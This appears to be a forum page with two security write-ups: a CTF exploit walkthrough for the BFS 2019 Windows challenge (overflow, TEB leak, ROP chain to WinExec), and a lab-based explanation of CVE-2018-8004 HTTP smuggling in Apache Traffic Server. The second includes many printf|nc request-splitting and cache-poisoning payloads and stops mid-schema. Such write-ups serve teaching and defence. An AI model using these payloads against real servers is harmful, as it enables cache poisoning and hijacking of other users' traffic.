    Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommended following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that need to be analyzed for weaknesses was as little as 17 functions out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself. Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to a 32 bit register eax, zero extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue which eventually needs to be taken care of . Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client. Looking at the cross references to "g_gadget_array" which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled with a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the sake of progressing and then fixing it the other day: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable. Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget that is shown in the screenshot above to do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx variable", "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gagdet 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR identify the stack cookie's position on the stack leak the stack cookie locate ourselves on the stack eventually run an external process In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters with a size that would overflow the entire stack frame but stopping right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text whose address had previously been acquired. While this might have been an interesting approach, it is an approach that is error-prone because if the cookie contained any null-bytes right in the middle, the call to printf() will make a partial copy of the cookie only which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB and walk the entire stack, starting from StackLimit, looking for the first occurence of the saved return address to main(). Relative from there, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand will allow the rsp register to be recovered, which can then be used to build the final ROP chain. Building a ROP Chain Now that we know how to leak all information from the vulnerable process that is required for building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc. Using ROPgadget, a list of gadgets was created which was then used to craft the following chain: The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the orignal return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid trashing the caller's stack frame. Messing up the caller's frame would risk stable process continuation This gadget loads the address of a "pop rax" gadget into r12 in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.). A pointer to "buf" is loaded into rax, which now points to the "calc\0" string The pointer to "calc\0" is copied to rcx which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes a "pop rax" gadget to be executed which will pop the address off of the stack again This gadget causes the WinExec() API function to be called The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec() The original return address to main()+0x14a is loaded into rax rbx is loaded with the address of "entry_point" The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation see 10.) see 10.) see 10.) See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
  20. 1 point
    Security: HTTP Smuggling, Apache Traffic Server Sept 17, 2019 english and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server). What is this about ? Apache Traffic Server ? Fixed versions of ATS CVE-2018-8004 Step by step Proof of Concept Set-up the lab: Docker instances Test That Everything Works Request Splitting by Double Content-Length Request Splitting by NULL Character Injection Request Splitting using Huge Header, Early End-Of-Query Cache Poisoning using Incomplete Queries and Bad Separator Prefix Attack schema HTTP Response Splitting: Content-Length Ignored on Cache Hit Attack schema Timeline See also English version (Version Française disponible sur makina corpus). estimated read time: 15 min to really more What is this about ? This article will give a deep explanation of HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much informations about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test thanks for the great stuff of James Kettle (@albinowax). So, this time, I'll give you not only details but also a step by step demo with some DockerFiles to build your own test lab. You could use that test lab to experiment it with manual raw queries, or test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended consequences (and we'll see in this article, with the last issue, that unattended behaviors can always happen). Apache Traffic Server ? Apache Traffic Server, or ATS is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It's not related to Apache httpd HTTP server, the "Apache" name comes from the Apache foundation, the code is very different from httpd. If you were to search from ATS installations on the wild you would find some, hopefully fixed now. Fixed versions of ATS As stated in the CVE announce (2018-08-28) impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That's the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out of support versions. CVE-2018-8004 The official CVE description is: There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS. Which does not gives a lot of pointers, but there's much more information in the 4 pull requests listed: #3192: Return 400 if there is whitespace after the field name and before the colon #3201: Close the connection when returning a 400 error response #3231: Validate Content-Length headers for incoming requests #3251: Drain the request body if there is a cache hit If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request. The last one, Drain the request body if there is a cache hit is the nicest one, as we will see on this article, and it was hard to detect. My original report listed 5 issues: HTTP request splitting using NULL character in header value HTTP request splitting using huge header size HTTP request splitting using double Content-length headers HTTP cache poisoning using extra space before separator of header name and header value HTTP request splitting using ...(no spoiler: I keep that for the end) Step by step Proof of Concept To understand the issues, and see the effects, We will be using a demonstration/research environment. If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because: You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors. You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all. You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self reflected XSS, you could end up in a court for that. Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env. And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps). Set-up the lab: Docker instances We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x. To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one. 4 HTTP actors, each one on a local port: : HaProxy (internally listening on port 80) : Nginx (internally listening on port 80) : ATS7 (internally listening on port 8080) : ATS6 (internally listening on port 8080), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain). We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6) Note that the localhost port mapping of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder. +---[80]---+ | 8001->80 | | HaProxy | | | +--+---+---+ [dummy-host6.example.com] | | [dummy-host7.example.com] +-------+ +------+ | | +-[8080]-----+ +-[8080]-----+ | 8006->8080 | | 8007->8080 | | ATS6 | | ATS7 | | | | | +-----+------+ +----+-------+ | | +-------+-------+ | +--[80]----+ | 8002->80 | | Nginx | | | +----------+ To build this cluster we will use docker-compose, You can the find the docker-compose.yml file here, but the content is quite short: version: '3' services: haproxy: image: haproxy:1.6 build: context: . dockerfile: Dockerfile-haproxy expose: - 80 ports: - "8001:80" links: - ats7:linkedats7.net - ats6:linkedats6.net depends_on: - ats7 - ats6 ats7: image: centos:7 build: context: . dockerfile: Dockerfile-ats7 expose: - 8080 ports: - "8007:8080" depends_on: - nginx links: - nginx:linkednginx.net ats6: image: centos:7 build: context: . dockerfile: Dockerfile-ats6 expose: - 8080 ports: - "8006:8080" depends_on: - nginx links: - nginx:linkednginx.net nginx: image: nginx:latest build: context: . dockerfile: Dockerfile-nginx expose: - 80 ports: - "8002:80" To make this work you will also need the 4 specific Dockerfiles: Docker-haproxy: an HaProxy Dockerfile, with the right conf Docker-nginx: A very simple Nginx Dockerfile with one index.html page Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile Put all theses files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir: docker-compose build && docker-compose up You can now take a big break, you are launching two compilations of ATS. Hopefully the next time a up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions. Test That Everything Works We will run basic non attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with printf for example) and socket handling (with netcat -- or nc --). Test Nginx (that's a one-liner splitted for readability): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8002 You should get the index.html response, something like: HTTP/1.1 200 OK Server: nginx/1.15.5 Date: Fri, 26 Oct 2018 15:28:20 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT Connection: keep-alive ETag: "5bd321bc-78" X-Location-echo: / X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Then test ATS7 and ATS6: printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8007 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8006 Then test HaProxy, altering the Host name should make the transit via ATS7 or ATS6 (check the Server: header response): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8001 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8001 And now let's start a more complex HTTP stuff, we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks: # send one pipelined chain of queries printf 'GET /?cache=1 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=2 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=3 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ 'GET /?cache=4 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8001 This is pipelining, it's not only using HTTP keepAlive, because we send the chain of queries without waiting for the responses. See my previous post for detail on Keepalives and Pipelining. You should get the Nginx access log on the docker-compose output, if you do not rotate some arguments in the query nginx wont get reached by your requests, because ATS is caching the result already (CTRL+C on the docker-compose output and docker-compose up will remove any cache). Request Splitting by Double Content-Length Let's start a real play. That's the 101 of HTTP Smuggling. The easy vector. Double Content-Length header support is strictly forbidden by the RFC 7230 3.3.3 (bold added): 4 If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response. Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005). Sending such query directly on ATS generates 2 responses (one 400 and one 200): printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Content-Length: 0\r\n'\ 'Content-Length: 66\r\n'\ '\r\n'\ 'GET /index.html?toto=2 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8007 The regular response should be one error 400. Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is Critical Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected. And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let's say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you're done, without being blocked by a previous actor. On our current case, ATS, you have one example of such hidden-header issue with the 'space-before-:' that we will analyze later. Request Splitting by NULL Character Injection This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline. So, a valid (almost, if you except the NULL character) pipeline like this one: 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 X-Foo: Bar\r\n 04 \r\n 05 GET /index.html?bar=1 HTTP/1.1\r\n 06 Host: dummy-host7.example.com\r\n 07 \r\n Generates 2 error 400. because the second query is starting with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there'is no \r\n between the 2 queries): 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 GET /index.html?bar=2 HTTP/1.1\r\n 04 Host: dummy-host7.example.com\r\n 05 \r\n It generates 1 error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request Splitting attack. But line 03 is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line. GET /index.html?bar=2 HTTP/1.1\r\n != <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF] For the first line the syntax is one of these two lines: <METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF] <METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri) LOCATION may be used to inject the special [:] that is required in an header line, especially on the query string part, but this would inject a lot of bad characters in the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try with the ABSOLUTE-URI alternative syntax, where the [:] comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header). 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 X-Something: \0 something\r\n 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n 05 \r\n Here the bad header which becomes a query is line 04, and the header name is GET http with an header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed). A real attack using this trick will looks like this: printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-Something: "\0something"\r\n'\ 'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\ '\r\n'\ 'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8007 This is just 2 queries (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:34:53 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> Then: HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replacing=1&zorg=2 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> And then the extra unused response: HTTP/1.1 404 Not Found Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 153 Age: 0 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.15.5</center> </body> </html> If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad. HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad request</h1> Your browser sent an invalid request. </body></html> That's an HTTP request splitting attack, but real world usage may be hard to find. The fix on ATS is the 'close on error', when an error 400 is triggered the pipelined is stopped, the socket is closed after the error. Request Splitting using Huge Header, Early End-Of-Query This attack is almost the same as the previous one, but do not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way than the with the NULL premature end of query. A note on printf huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example): X: ==============( 65 532 '=' )========================\r\n You can use the %ns form in printf to generate this, generating big number of spaces. But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string: printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " Try it against Nginx : printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65532s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 8002 I gat one error 400, that's the normal stuff. It Nginx does not like huge headers. Now try it against ATS7: printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65534s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 8007 And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:40:17 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:40:17 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replaced=0&cache=8 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Cache Poisoning using Incomplete Queries and Bad Separator Prefix Cache poisoning, that's sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous. ATS support an invalid header Syntax: HEADER[SPACE]:HEADER VALUE\r\n That's not conform to RFC7230 section 3.3.2: Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace. So : HEADER:HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK And RFC7230 section 3.2.4 adds (bold added): No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream. ATS will interpret the bad header, and also forward it without alterations. Using this flaw we can add some headers in our request that are invalid for any valid HTTP agents but still interpreted by ATS like: Content-Length :77\r\n Or (try it as an exercise) Transfer-encoding :chunked\r\n Some HTTP servers will effectively reject such message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx for example. ATS will maintain a keep-alive connection to the Nginx Backend, so we'll use this ignored header to transmit a body (ATS think it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago. 01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-Control: max-age=200\r\n 04 X-info: evil 1.5 query, bad CL header\r\n 05 Content-Length :117\r\n 06 \r\n 07 GET /index.html?INJECTED=1 HTTP/1.1\r\n 08 Host: dummy-host7.example.com\r\n 09 X-info: evil poisoning query\r\n 10 Dummy-incomplete: Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS transmitted to backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and first response is returned). Line 10 has no "\r\n". so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ... Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers] Innocent Attacker ATS Nginx | | | | | 